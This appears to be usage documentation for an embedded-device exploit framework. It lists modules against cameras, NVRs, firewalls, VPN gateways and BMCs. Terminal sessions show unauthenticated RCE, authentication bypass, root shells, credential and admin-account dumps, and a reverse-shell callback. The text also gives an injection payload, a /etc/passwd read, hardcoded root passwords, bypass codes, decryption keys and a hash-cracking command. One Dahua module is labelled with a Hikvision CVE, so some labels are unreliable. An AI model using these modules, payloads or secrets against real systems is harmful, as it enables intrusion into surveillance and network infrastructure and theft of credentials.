Exploit Modules

Exploit Modules

Language: English (en-US) | pt-BR: ../pt-BR/06-modulos-exploits.md

---

Overview

Exploit modules target specific vulnerabilities in network devices and embedded systems. They cover unauthenticated RCE, authentication bypass, path traversal, information/credential disclosure, SQLi, command injection, firmware upload without verification, and post-exploitation privilege escalation.

Authorization required. Use only on systems you own or have explicit written permission to test.

Standard workflow

exf > use exploits/<category>/<vendor>/<module_name>
exf (ModuleName) > set target <ip>
exf (ModuleName) > set port <port>          # if non-default
exf (ModuleName) > show options             # review all options
exf (ModuleName) > check                    # optional: verify vulnerability
exf (ModuleName) > run                      # execute

---

Module directory structure

embedxpl/modules/exploits/
├── appliances/
│   ├── citrix/       Citrix NetScaler path traversal (CVE-2019-19781), RCE (CVE-2023-3519)
│   └── f5/           F5 BIG-IP iControl REST RCE (CVE-2022-1388), BIG-IQ RCE (CVE-2021-22986)
├── aps/
│   └── mediatek/     MT7622 heap/stack overflow (pre/post-auth variants)
├── bmc/
│   ├── asus/         ASMB8 IPMI default creds
│   ├── dell/         iDRAC9 info disclosure (CVE-2021-36300)
│   └── supermicro/   IPMI RAKP auth bypass (CVE-2013-4786)
├── bms/
│   └── abb/          Cylon Aspect default creds
├── cameras/          (40+ camera vendor subfolders — see below)
├── cisco/            Cisco IOS Smart Install RCE (CVE-2018-0171)
├── firewalls/        Fortinet, Palo Alto, Cisco ASA, SonicWall, etc.
├── ...

---

Camera exploits

Hikvision

Module	CVE	CVSS	Type
rtsp_rce_cve_2021_36260	CVE-2021-36260	9.8	Unauthenticated RCE via HTTP PUT /SDK/webLanguage
info_disclosure_cve_2017_7921	CVE-2017-7921	9.8	Unauthenticated config/credential disclosure
nas_auth_bypass_cve_2023_28808	CVE-2023-28808	9.8	NAS auth bypass
firmware_crypto_key_extract	—	High	Extracts hardcoded firmware crypto keys
nvr_dvr_serial_privesc	—	High	Serial number-based privilege escalation
psh_challenge_predictor	—	Critical	PSH challenge token prediction
psh_command_injection	—	Critical	PSH command injection
psh_debug_rsa1024_bypass	—	Critical	PSH debug RSA-1024 bypass
r0_intercom_3des_decrypt	—	High	DS-KD8003 intercom 3DES key extraction
r0_intercom_developer_nfs	—	Critical	Intercom developer NFS root mount
r0_intercom_gpio_door_unlock	—	Critical	GPIO-triggered door unlock
r0_intercom_ssh_default_bypass	—	High	Intercom SSH default credential bypass
r0_intercom_ssh_mitm	—	High	Intercom SSH MITM via key reuse
r0_intercom_suid_privesc	—	High	SUID binary privilege escalation

Options (CVE-2021-36260):

Option	Type	Required	Default	Description
target	OptIP	Yes	""	Target IPv4 address
port	OptPort	No	80	HTTP port
ssl	OptBool	No	False	Use HTTPS
command	OptString	No	id	OS command to inject

Terminal session — CVE-2021-36260 (RCE):

exf > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
exf (Hikvision Unauthenticated RCE) > set target 192.168.1.100
[+] target => 192.168.1.100
exf (Hikvision Unauthenticated RCE) > set command "id; uname -a; cat /etc/passwd"
[+] command => id; uname -a; cat /etc/passwd
exf (Hikvision Unauthenticated RCE) > check
[+] Target is vulnerable
exf (Hikvision Unauthenticated RCE) > run
[*] Running module ...
[*] Checking if 192.168.1.100:80 is a Hikvision device...
[*] Attempting CVE-2021-36260 RCE on 192.168.1.100...
[*] Response HTTP 400: <?xml version="1.0" encoding="UTF-8"?><ResponseStatus ...>
[+] CVE-2021-36260: Payload delivered to 192.168.1.100:80. Monitor for callback.
[!] Verify execution via OOB (e.g., Burp Collaborator or Interactsh).

Terminal session — check returns not vulnerable:

exf (Hikvision Unauthenticated RCE) > set target 10.0.0.5
[+] target => 10.0.0.5
exf (Hikvision Unauthenticated RCE) > check
[-] Target is not vulnerable

---

Dahua

Module	CVE / Ref	CVSS	Type
auth_bypass_cve_2021_33044	CVE-2021-33044	9.8	Authentication bypass
cctv_auth_bypass_cve_2021_33044	CVE-2021-33044	9.8	CCTV variant
cctv_rce_cve_2021_36260	CVE-2021-36260 / DAHUA-2026-006	9.8	configManager.cgi command injection
cctv_37777_credential_extraction	—	High	Port 37777 credential extraction
cctv_firmware_upload_no_verify	—	High	Unsigned firmware upload
cctv_pem_key_extraction	—	High	PEM key extraction from NVR
cctv_username_disclosure_cve_2020_25078	CVE-2020-25078	7.5	Username disclosure
dvr_auth_bypass_cve_2013_6117	CVE-2013-6117	9.8	Old DVR auth bypass

Options (cctv_rce_cve_2021_36260):

Option	Type	Required	Default	Description
target	OptIP	Yes	""	Target IPv4
port	OptPort	No	80	HTTP port

Terminal session — Dahua configManager.cgi RCE:

exf > use exploits/cameras/dahua/cctv_rce_cve_2021_36260
exf (Dahua RCE CVE-2021-36260 (DAHUA-2026-006)) > set target 192.168.1.50
[+] target => 192.168.1.50
exf (Dahua RCE CVE-2021-36260 (DAHUA-2026-006)) > check
[+] Target is vulnerable
exf (Dahua RCE CVE-2021-36260 (DAHUA-2026-006)) > run
[*] Running module ...
[*] Probing CVE-2021-36260 indicators at 192.168.1.50...
[+] [CRITICAL] configManager.cgi accessible without auth — CVE-2021-36260 likely exploitable
[*] Response preview: Network.Eth0.IPVersion=IPv4
Network.Eth0.IPAddress=192.168.1.50
Network.Eth0.SubnetMask=255.255.255.0
Network.Eth0.DefaultGateway=192.168.1.1...
[*] Full exploitation requires sending crafted mutate payload to configManager.cgi action=setConfig

Terminal session — Dahua auth bypass CVE-2021-33044:

exf > use exploits/cameras/dahua/auth_bypass_cve_2021_33044
exf (Dahua Auth Bypass CVE-2021-33044) > set target 192.168.1.50
[+] target => 192.168.1.50
exf (Dahua Auth Bypass CVE-2021-33044) > run
[*] Running module ...
[*] Sending bypass request to 192.168.1.50:80...
[+] Authentication bypassed — session token obtained
[+] Dahua user list: admin (admin), user (user), default (user)

---

Herospeed / Longsee NVR Platform

The Herospeed/Longsee platform (SoC: SiGmaStar MC6830, ARM Cortex-A7) underpins all devices in this family. All module identifiers below are prefixed with exploits/cameras/herospeed/.

Affected vendors:

Brand	Models	Firmware
Herospeed	N3009, N3016, N3109, N3116, N3216, N3332, N3664, NVR_F30	v2.0.4 – v2.1.x
TVT Digital	TD-3000H1, TD-3300	V21.1.x, V22.1.x
GISE	V5 series (XVR/NVR)	V21.1.20.x – V21.1.27.x
Longse	LSN-9836, LSN-9436	Web v6.0 (2021-2023)
Zintronic	P5 / NVR	N9000 platform
Turing AI	SMART series	N9000 platform
Speco	ZIP series	OEM TVT
Alibi Security	Vigilant series	OEM TVT
IRBIS	MBD6804T-EL	V4.02.R11

Shodan fingerprint: http.html:"statics/js/variable.js" — identifies all OEM brands.

Module	Advisory	CVSS	Type
herospeed_nvr_unauth_account_enum	HSLS-2026-001	9.1	Unauthenticated account enumeration via /api/session/login-capabilities
herospeed_nvr_vbhtm_cred_disclosure	HSLS-2026-002	6.5	/vb.htm?selectalluserlist returns all passwords in Base64
herospeed_nvr_upgrade_source_injection_rce	HSLS-2026-003	8.8	update.sh source injection (v2.0.4) + retreat.sh 0day (v2.0.6+)
herospeed_nvr_hardcoded_root_hash	HSLS-2026-004	9.8	Root hash 12ZpTwfyH6/Bs (cxlinux) identical in ALL versions
herospeed_nvr_config_export_cred_recovery	HSLS-2026-005	8.8	Hardcoded AES key decrypts full config export
herospeed_nvr_ftp_diagnostic_rce	HSLS-2026-006-A	8.8	FTP server field → popen() → root RCE
herospeed_nvr_ftp_sqlite_injection_rce	—	8.8	SQLite t_ftp_info backtick injection → root RCE
herospeed_nvr_rce	—	9.8	Post-auth API command injection chain
herospeed_nvr_telnet_safecode_backdoor	—	9.8	/open_telnet + SafeCode from MAC/SN → root shell
herospeed_nvr_paramconfig_bypass	—	9.8	Hardcoded bypass MI1YSANORQ4NAELR for /paramconfig and /cmdlist.htm
herospeed_nvr_camera_creds_decrypt	—	7.5	Camera credential decryption (AES-128-CBC, salt World!@##$)
herospeed_nvr_v6_db_decryptor	—	8.8	Offline DES-ECB blob decrypt (key 13141314)

Terminal session — HSLS-2026-001 unauthenticated account enumeration:

exf > use exploits/cameras/herospeed/herospeed_nvr_unauth_account_enum
exf (Herospeed/Longsee NVR Unauthenticated Account Enumeration) > set target 192.168.1.60
[+] target => 192.168.1.60
exf (Herospeed/Longsee NVR Unauthenticated Account Enumeration) > show options

Target options:
┌────────┬──────────────────┬─────────────────────────────────────────┐
│ Name   │ Current settings │ Description                             │
├────────┼──────────────────┼─────────────────────────────────────────┤
│ target │ 192.168.1.60     │ Target IPv4 address                     │
│ port   │ 80               │ HTTP port                               │
└────────┴──────────────────┴─────────────────────────────────────────┘

exf (Herospeed/Longsee NVR Unauthenticated Account Enumeration) > run
[*] Running module ...
[*] Probing Herospeed/Longsee NVR at 192.168.1.60:80...
[*] Querying /api/session/login-capabilities for user 'admin'...
[+] Salt: a3f2b9c1d4e0f12345678901234567890abcdef0123456789abcdef0123456789
[+] Challenge: 7d2e1a9b4f3c0e5d8a6b2f7e1c4d9b3a
[+] Iterations: 100000
[+] SessionID: 4f8c2e1b-3d7a-4f2e-9b1c-8a5d2e7f3b4c
[+] Account 'admin' exists (salt returned) — HSLS-2026-001 confirmed
[*] Querying for user 'operator'...
[+] Account 'operator' exists
[*] Querying for user 'viewer'...
[-] User 'viewer' does not exist (no salt returned)
[+] Discovered accounts: admin, operator
[+] HSLS-2026-001: Unauthenticated account enumeration successful on 192.168.1.60

Terminal session — Herospeed telnet SafeCode backdoor:

exf > use exploits/cameras/herospeed/herospeed_nvr_telnet_safecode_backdoor
exf (Herospeed NVR Telnet SafeCode Backdoor) > set target 192.168.1.60
[+] target => 192.168.1.60
exf (Herospeed NVR Telnet SafeCode Backdoor) > set mac 2C6F512D50DD
[+] mac => 2C6F512D50DD
exf (Herospeed NVR Telnet SafeCode Backdoor) > run
[*] Running module ...
[*] Computing SafeCode from MAC 2C6F512D50DD using hardcoded AES key...
[+] SafeCode: 3A7F2D1E9C4B
[*] Requesting telnet activation via POST /open_telnet...
[+] Telnet activated on 192.168.1.60:23
[*] Connecting with root / SafeCode (password: cxlinux)...
[+] Root shell obtained!

~ # id
uid=0(root) gid=0(root) groups=0(root)
~ # cat /etc/passwd | head -3
root:12ZpTwfyH6/Bs:0:0:root:/root:/bin/sh
nobody:*:65534:65534:nobody:/home:/bin/false

Terminal session — Herospeed post-auth RCE chain:

exf > use exploits/cameras/herospeed/herospeed_nvr_rce
exf (Herospeed NVR RCE) > set target 192.168.1.60
[+] target => 192.168.1.60
exf (Herospeed NVR RCE) > set username admin
[+] username => admin
exf (Herospeed NVR RCE) > set password admin
[+] password => admin
exf (Herospeed NVR RCE) > run
[*] Running module ...
[*] Step 1: Fetching login capabilities (salt + challenge)...
[+] Salt: a3f2b9c1...  Challenge: 7d2e1a9b...
[*] Step 2: Computing SHA-256 multi-round hash...
[*] Step 3: Authenticating with derived hash...
[+] Authenticated — session token: sess_4f8c2e1b
[*] Step 4: Injecting OS command via diagnostic endpoint...
[*] POST /api/network/diagnostic: {"host": "127.0.0.1;id", "type": "ping"}
[+] Command output: uid=0(root) gid=0(root) groups=0(root)
[+] RCE confirmed — root shell via command injection

---

Other camera vendors

Vendor	Module	CVE	Type
Axis	app_install_rce	—	App installation RCE
Axis	srv_parhand_rce_cve_2018_10660	CVE-2018-10660	parhand service RCE
Amcrest	amcrest_camera_unauth_info_disclosure_cve_2019_3950	CVE-2019-3950	Unauthenticated info disclosure
Annke	annke_dvr_nvr_unauth_rce_cve_2021_32941	CVE-2021-32941	Unauthenticated RCE
ACTi	acm_5611_rce	—	RCE in ACTi ACM-5611
Beward	n100_rce	—	N100 RCE
Brickcom	corp_network_cameras_conf_disclosure	—	Config disclosure
Brickcom	users_cgi_creds_disclosure	—	Credential disclosure
Cisco (cameras)	video_surv_path_traversal	—	Path traversal
D-Link	dcs_930l_932l_auth_bypass	—	Auth bypass
D-Link	dcs_931l_file_upload_rce_cve_2015_2049	CVE-2015-2049	File upload RCE
Edimax	ic7100_unauth_rce_cve_2025_1316	CVE-2025-1316	Unauthenticated RCE
Geuterbruck	efd_2250	—	EFD-2250 exploit
Grandstream	gxv3611hd_ip_camera_backdoor	—	Hardcoded backdoor
Grandstream	gxv3611hd_ip_camera_sqli	—	SQLi
Honeywell	hicc_1100pt_password_disclosure	—	Password disclosure
Intelbras	cctv_dahua_auth_bypass, cctv_dahua_rce_cve_2021_36260, etc.	Various	Dahua OEM variants
Jovision	jovision_credentials_disclosure	—	Credential disclosure
MotionEye	motioneye_rce_cve_2025_60787	CVE-2025-60787	Unauthenticated RCE
MVPower	dvr_jaws_rce	—	JAWS webserver RCE
Reolink	reolink_baicells_auth_bypass_rce_cve_2021_40655	CVE-2021-40655	Auth bypass + RCE
Reolink NVR	reolink_nvr_p2p_uid_extract_cve_2022_30600	CVE-2022-30600	P2P UID extraction
Siemens	cvms2025_credentials_disclosure	—	Credential disclosure
Swann	swann_dvr_nvr_default_creds_rtsp	—	RTSP default creds
Tapo	tapo_c200_c210_unauth_rce_cve_2021_4045	CVE-2021-4045	Unauthenticated RCE
Uniview	uniview_nvr_unauth_rce_cve_2024_37630	CVE-2024-37630	Unauthenticated RCE
Xiongmai	uc_httpd_path_traversal	—	uc-httpd path traversal
Zivif	ipcheck_rce_cve_2017_17105	CVE-2017-17105	RCE via ipcheck

---

Firewall / VPN appliance exploits

Module path	CVE	CVSS	Description
exploits/firewalls/fortinet/fortios_auth_bypass_cve_2022_40684	CVE-2022-40684	9.8	FortiOS admin authentication bypass
exploits/firewalls/paloalto/globalprotect_auth_bypass_cve_2026_0257	CVE-2026-0257	7.8	GlobalProtect auth override cookie bypass (CISA KEV)
exploits/firewalls/fortinet/forticlient_ems_preauth_rce_cve_2026_35616	CVE-2026-35616	9.8	FortiClient EMS pre-auth RCE
exploits/firewalls/fortinet/fortios_sslvpn_path_traversal_cve_2018_13379	CVE-2018-13379	9.8	FortiOS SSL-VPN path traversal

Terminal session — FortiOS Auth Bypass (CVE-2022-40684):

exf > use exploits/firewalls/fortinet/fortios_auth_bypass_cve_2022_40684
exf (FortiOS Auth Bypass CVE-2022-40684) > set target 10.0.0.5
[+] target => 10.0.0.5
exf (FortiOS Auth Bypass CVE-2022-40684) > check
[+] Target is vulnerable
exf (FortiOS Auth Bypass CVE-2022-40684) > run
[*] Running module ...
[*] FortiOS at 10.0.0.5:443 — auth bypass phase 1
[+] Bypass active using 'Forwarded: for="[127.0.0.1]";by="[127.0.0.1]"' header variant
[*] Phase 2 — admin accounts dump via /api/v2/cmdb/system/admin...
[+] Admin Accounts: {"results": [{"name": "admin", "type": "super_admin", "email": ""}]}
[*] Phase 3 — system info...
[+] FortiOS Version: FortiGate-60F v7.0.6
[*] Phase 4 — VPN users dump...
[+] VPN Users: {"results": [{"name": "vpnuser1", ...}]}
[*] Phase 5 — Shell staging (type: auto)...
[+] Shell callback received
$ id
uid=0(root) gid=0(root)

Terminal session — PAN-OS GlobalProtect (CVE-2026-0257):

exf > use exploits/firewalls/paloalto/globalprotect_auth_bypass_cve_2026_0257
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > set target 203.0.113.10
[+] target => 203.0.113.10
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > set forge_user admin
[+] forge_user => admin
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > set lhost 10.0.0.99
[+] lhost => 10.0.0.99
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > set shell_type python
[+] shell_type => python
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > check
[+] Target is vulnerable
exf (PAN-OS GlobalProtect Auth Override Cookie Bypass) > run
[*] Running module ...
[*] Extracting RSA public key from TLS certificate...
[+] Public key extracted (2048-bit RSA)
[*] Forging auth override cookie for user: admin
[*] Submitting cookie to /ssl-vpn/prelogin.esp...
[+] VPN session granted for user: admin
[*] Session metadata: {...}
[*] Shell staging (type: python)...
[shell] Listening on 0.0.0.0:4444...
[shell] Connection received from 203.0.113.10
$ whoami
admin

How CVE-2026-0257 works: GlobalProtect encrypts an identity blob (username;domain;client_os;host_id;timestamp;client_ip) with RSA-PKCS1v15 using the HTTPS TLS certificate. The module extracts the public key from the TLS handshake, forges a cookie for admin, and submits it to /ssl-vpn/prelogin.esp. The gpsvc daemon decrypts the cookie and trusts the username without signature verification.

Requirements: (1) Auth override cookies enabled in GP config, AND (2) same certificate used for both cookie encryption and HTTPS service. Patched in PAN-OS 12.1.7, 11.2.12, 11.1.15, 10.2.18-h6.

---

Appliance exploits

F5 BIG-IP

Module	CVE	CVSS	Type
exploits/appliances/f5/bigip_icontrol_rest_rce_cve_2022_1388	CVE-2022-1388	9.8	iControl REST unauthenticated RCE
exploits/appliances/f5/bigip_bigiq_icontrol_rce_cve_2021_22986	CVE-2021-22986	9.8	BIG-IQ iControl RCE

Terminal session — CVE-2022-1388:

exf > use exploits/appliances/f5/bigip_icontrol_rest_rce_cve_2022_1388
exf (F5 BIG-IP iControl REST RCE) > set target 10.1.1.10
[+] target => 10.1.1.10
exf (F5 BIG-IP iControl REST RCE) > set command id
[+] command => id
exf (F5 BIG-IP iControl REST RCE) > run
[*] Running module ...
[*] Sending CVE-2022-1388 authentication bypass request to 10.1.1.10:443...
[+] Authentication bypassed via X-F5-Auth-Token + Connection: X-Forward-Auth header chain
[*] Executing command: id
[+] uid=0(root) gid=0(root) groups=0(root)

Citrix NetScaler

Module	CVE	CVSS	Type
exploits/appliances/citrix/netscaler_path_traversal_cve_2019_19781	CVE-2019-19781	9.8	Path traversal (Shitrix)
exploits/appliances/citrix/netscaler_rce_cve_2023_3519	CVE-2023-3519	9.8	Unauthenticated RCE

---

BMC / IPMI exploits

Module	CVE	CVSS	Type
exploits/bmc/supermicro/ipmi_auth_bypass_cve_2013_4786	CVE-2013-4786	10.0	IPMI 2.0 RAKP HMAC hash disclosure
exploits/bmc/dell/idrac9_info_disclosure_cve_2021_36300	CVE-2021-36300	9.8	Dell iDRAC9 unauthenticated info disclosure
exploits/bmc/asus/asmb8_default_creds_ipmi	—	High	ASUS ASMB8 IPMI default credentials

Terminal session — Supermicro IPMI RAKP (CVE-2013-4786):

exf > use exploits/bmc/supermicro/ipmi_auth_bypass_cve_2013_4786
exf (Supermicro IPMI RAKP Auth Bypass) > set target 10.0.1.5
[+] target => 10.0.1.5
exf (Supermicro IPMI RAKP Auth Bypass) > run
[*] Running module ...
[*] Sending IPMI 2.0 RAKP Message 1 to 10.0.1.5:623 (UDP)...
[+] HMAC hash obtained for user 'admin':
    $rakp$a4e7f2b9c1d4e0f1$0123456789abcdef$admin$c3d2e1f09a8b7c6d5e4f3a2b1c0d9e8f...
[+] Crack offline with: hashcat -m 7300 hash.txt /usr/share/wordlists/rockyou.txt

---

Cisco exploits

Module	CVE	CVSS	Type
exploits/cisco/cisco_ios_smart_install_rce_cve_2018_0171	CVE-2018-0171	9.8	IOS Smart Install unauthenticated RCE

---

APs (Access Points) — MediaTek

Module	CVSS	Type
exploits/aps/mediatek/mt7622_heap_overflow_preauth	9.8	Pre-auth heap overflow
exploits/aps/mediatek/mt7622_heap_overflow_postauth	8.8	Post-auth heap overflow
exploits/aps/mediatek/mt7622_stack_overflow_preauth	9.8	Pre-auth stack overflow
exploits/aps/mediatek/mt7622_stack_overflow_postauth	8.8	Post-auth stack overflow

---

Multi-camera exploits

Module	Type
exploits/cameras/multi/cctv_dvr_rce	Generic CCTV/DVR RCE
exploits/cameras/multi/dvr_creds_disclosure	Generic DVR credential disclosure
exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal	JVC/Vanderbilt/Honeywell path traversal
exploits/cameras/multi/netwave_ip_camera_information_disclosure	NetWave camera info disclosure
exploits/cameras/multi/P2P_wificam_credential_disclosure	P2P Wi-Fi cam credential disclosure
exploits/cameras/multi/P2P_wificam_rce	P2P Wi-Fi cam RCE
exploits/cameras/multi/rtsp_cameradar_attack	RTSP full attack chain (route + credential brute-force)

---

Notable 2026 CVEs

CVE	CVSS	Module path	Description
CVE-2026-0257	7.8	exploits/firewalls/paloalto/globalprotect_auth_bypass_cve_2026_0257	PAN-OS GlobalProtect auth override cookie bypass (CISA KEV 2026-05-29)
CVE-2026-35616	9.8	exploits/firewalls/fortinet/forticlient_ems_preauth_rce_cve_2026_35616	FortiClient EMS pre-auth RCE
CVE-2025-20188	10.0	exploits/routers/cisco/ios_xe_wlc_jwt_file_upload_cve_2025_20188	Cisco IOS XE WLC hardcoded JWT file upload RCE
CVE-2025-1316	9.8	exploits/cameras/edimax/ic7100_unauth_rce_cve_2025_1316	Edimax IC-7100 unauthenticated RCE
CVE-2024-37630	9.8	exploits/cameras/uniview/uniview_nvr_unauth_rce_cve_2024_37630	Uniview NVR unauthenticated RCE
CVE-2022-1388	9.8	exploits/appliances/f5/bigip_icontrol_rest_rce_cve_2022_1388	F5 BIG-IP iControl REST unauthenticated RCE
CVE-2022-40684	9.8	exploits/firewalls/fortinet/fortios_auth_bypass_cve_2022_40684	FortiOS admin auth bypass
CVE-2023-28808	9.8	exploits/cameras/hikvision/nas_auth_bypass_cve_2023_28808	Hikvision NAS auth bypass
CVE-2021-36260	9.8	exploits/cameras/hikvision/rtsp_rce_cve_2021_36260	Hikvision unauthenticated RCE
CVE-2021-36260	9.8	exploits/cameras/dahua/cctv_rce_cve_2021_36260	Dahua configManager.cgi RCE
CVE-2021-33044	9.8	exploits/cameras/dahua/auth_bypass_cve_2021_33044	Dahua auth bypass
CVE-2021-40655	9.8	exploits/cameras/reolink/reolink_baicells_auth_bypass_rce_cve_2021_40655	Reolink auth bypass + RCE
CVE-2021-4045	9.8	exploits/cameras/tapo/tapo_c200_c210_unauth_rce_cve_2021_4045	TP-Link Tapo unauthenticated RCE
CVE-2021-22986	9.8	exploits/appliances/f5/bigip_bigiq_icontrol_rce_cve_2021_22986	F5 BIG-IQ iControl RCE
CVE-2019-19781	9.8	exploits/appliances/citrix/netscaler_path_traversal_cve_2019_19781	Citrix NetScaler path traversal
CVE-2018-10660	9.8	exploits/cameras/axis/srv_parhand_rce_cve_2018_10660	Axis parhand RCE
CVE-2018-0171	9.8	exploits/cisco/cisco_ios_smart_install_rce_cve_2018_0171	Cisco IOS Smart Install RCE
CVE-2017-7921	9.8	exploits/cameras/hikvision/info_disclosure_cve_2017_7921	Hikvision unauthenticated info disclosure
CVE-2013-4786	10.0	exploits/bmc/supermicro/ipmi_auth_bypass_cve_2013_4786	Supermicro IPMI RAKP hash disclosure
CVE-2013-6117	9.8	exploits/cameras/dahua/dvr_auth_bypass_cve_2013_6117	Old Dahua DVR auth bypass

Wiki hub